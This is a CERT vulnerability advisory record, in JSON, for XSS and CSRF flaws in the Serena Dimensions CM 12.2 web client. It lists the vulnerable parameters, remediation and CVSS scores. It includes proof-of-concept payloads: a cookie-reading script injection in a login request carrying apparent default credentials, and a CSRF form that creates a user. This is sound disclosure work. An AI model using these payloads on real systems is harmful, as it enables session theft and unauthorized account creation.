{"vuid":"VU#823452","idnumber":"823452","name":"Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities","keywords":["Serena","Dimensions","xss","csrf","cwe-79","cwe-352"],"overview":"Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.","clean_desc":"Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335 #Unauthenticated vulnerable parameters\n/dimensions/ [DB_CONN parameter]\n/dimensions/ [DB_NAME parameter]\n/dimensions/ [DM_HOST parameter]\n/dimensions/ [MAN_DB_NAME parameter] #Authenticated vulnerable parameters\n/dimensions/ [framecmd parameter]\n/dimensions/ [identifier parameter]\n/dimensions/ [identifier parameter]\n/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]\n/dimensions/ [nav_frame parameter]\n/dimensions/ [nav_jsp parameter]\n/dimensions/ [target_frame parameter]\n/dimensions/ [id parameter]\n/dimensions/ [type parameter] Proof-of-Concept: GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1 CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336 Proof-of-Concept: <html> <!-- CSRF PoC --> <body> <form \naction=\"http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects. User&create=yes\" method=\"POST\">\n<input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;user&#95;dept\" value=\"\" />\n<input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;id\" value=\"HACKTEST1\" />\n<input type=\"hidden\" name=\"USER&#95;CURWORKSET\" value=\"&#37;24GENERIC&#37;3a&#37;24GLOBAL\" /> <input type=\"hidden\" name=\"isUserEdit\" value=\"false\" /> <input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;user&#95;site\" value=\"\" /> <input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;user&#95;phone\" value=\"\" /> <input type=\"hidden\" name=\"AUTOMATIC&#95;LOGIN\" value=\"\" /> <input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;user&#95;group&#95;id\" value=\"\" /> <input type=\"hidden\" name=\"null\" value=\"\" /> <input type=\"hidden\" name=\"DIALOG&#95;MODE\" value=\"MODE&#37;5fCREATE\" /> <input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;user&#95;full&#95;name\" value=\"HACKTEST1\" /> <input type=\"hidden\" name=\"projectPicker\" value=\"&#37;24GENERIC&#37;3a&#37;24GLOBAL\" /> <input type=\"hidden\" name=\"wait&#95;until&#95;loaded\" value=\"\" /> <input type=\"hidden\" name=\"projectPickerUid\" value=\"1\" /> <input type=\"hidden\" name=\"GROUPS&#95;ASSIGNED\" value=\"\" /> <input type=\"hidden\" name=\"&#45;AdmAttrNames&#46;email\" \nvalue=\"ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl\" /> <input type=\"submit\" value=\"Submit request\" /> </form> </body>","impact":"A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session.","resolution":"Apply an update The vendor has addressed these issues in version 14.1. Users are encouraged to update to the latest release.","workarounds":"Restrict access As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.","sysaffected":"","thanks":"Thanks to Ken Cijsouw for reporting this vulnerability.","author":"This document was written by Michael Orlando.","public":["http://cwe.mitre.org/data/definitions/79.html","http://cwe.mitre.org/data/definitions/352.html","http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/"],"cveids":["CVE-2014-0335","CVE-2014-0336"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2014-01-09T13:11:27Z","publicdate":"2014-03-07T00:00:00Z","datefirstpublished":"2014-03-05T14:53:58Z","dateupdated":"2015-09-17T14:15:06Z","revision":14,"vrda_d1_directreport":"1","vrda_d1_population":"2","vrda_d1_impact":"2","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"M","cvss_authentication":null,"cvss_confidentialityimpact":"P","cvss_integrityimpact":"P","cvss_availabilityimpact":"P","cvss_exploitablity":null,"cvss_remediationlevel":"U","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"6.8","cvss_basevector":"AV:N/AC:M/Au:N/C:P/I:P/A:P","cvss_temporalscore":"5.5","cvss_environmentalscore":"1.38152301828188","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}